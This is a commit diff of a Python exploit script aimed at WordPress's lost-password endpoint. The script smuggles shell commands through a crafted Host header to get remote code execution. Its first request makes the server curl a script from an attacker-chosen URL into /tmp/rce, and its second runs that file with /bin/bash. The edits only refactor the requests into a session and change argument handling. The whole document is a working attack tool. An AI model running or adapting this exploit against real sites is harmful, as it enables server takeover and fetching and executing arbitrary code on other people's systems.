33import sys
44
55# wordpress's url
6- target = 'http://127.0.0.1' if not sys .argv [ 1 ] else sys .argv [1 ]
6+ target = 'http://127.0.0.1' if len ( sys .argv ) < 1 else sys .argv [1 ]
77# Put your command in a website, and use the website's url
88# don't contains "http://", must be all lowercase
9- shell_url = 'example.com/1.txt' if not sys .argv [ 2 ] else sys .argv [2 ]
9+ shell_url = 'example.com/1.txt' if len ( sys .argv ) < 2 else sys .argv [2 ]
1010# an exists user
1111user = 'admin'
1212
@@ -17,19 +17,19 @@ def generate_command(command):
1717 return 'target(any -froot@localhost -be %s null)' % command
1818
1919
20+ session = requests .session ()
2021data = {
2122 'user_login' : user ,
2223 'redirect_to' : '' ,
2324 'wp-submit' : 'Get New Password'
2425}
25- headers = {
26+ session . headers = {
2627 'Host' : generate_command ('/usr/bin/curl -o/tmp/rce ' + shell_url ),
2728 'User-Agent' : 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
2829}
29- proxies = {
30- 'http' : 'http://127.0.0.1:8080'
31- }
30+ session .allow_redirects = False
3231target += '/wp-login.php?action=lostpassword'
33- requests .post (target , headers = headers , data = data , proxies = proxies , allow_redirects = False )
34- headers ['Host' ] = generate_command ('/bin/bash /tmp/rce' )
35- requests .post (target , headers = headers , data = data , proxies = proxies , allow_redirects = False )
32+ session .post (target , data = data )
33+
34+ session .headers ['Host' ] = generate_command ('/bin/bash /tmp/rce' )
35+ session .post (target , data = data )
0 commit comments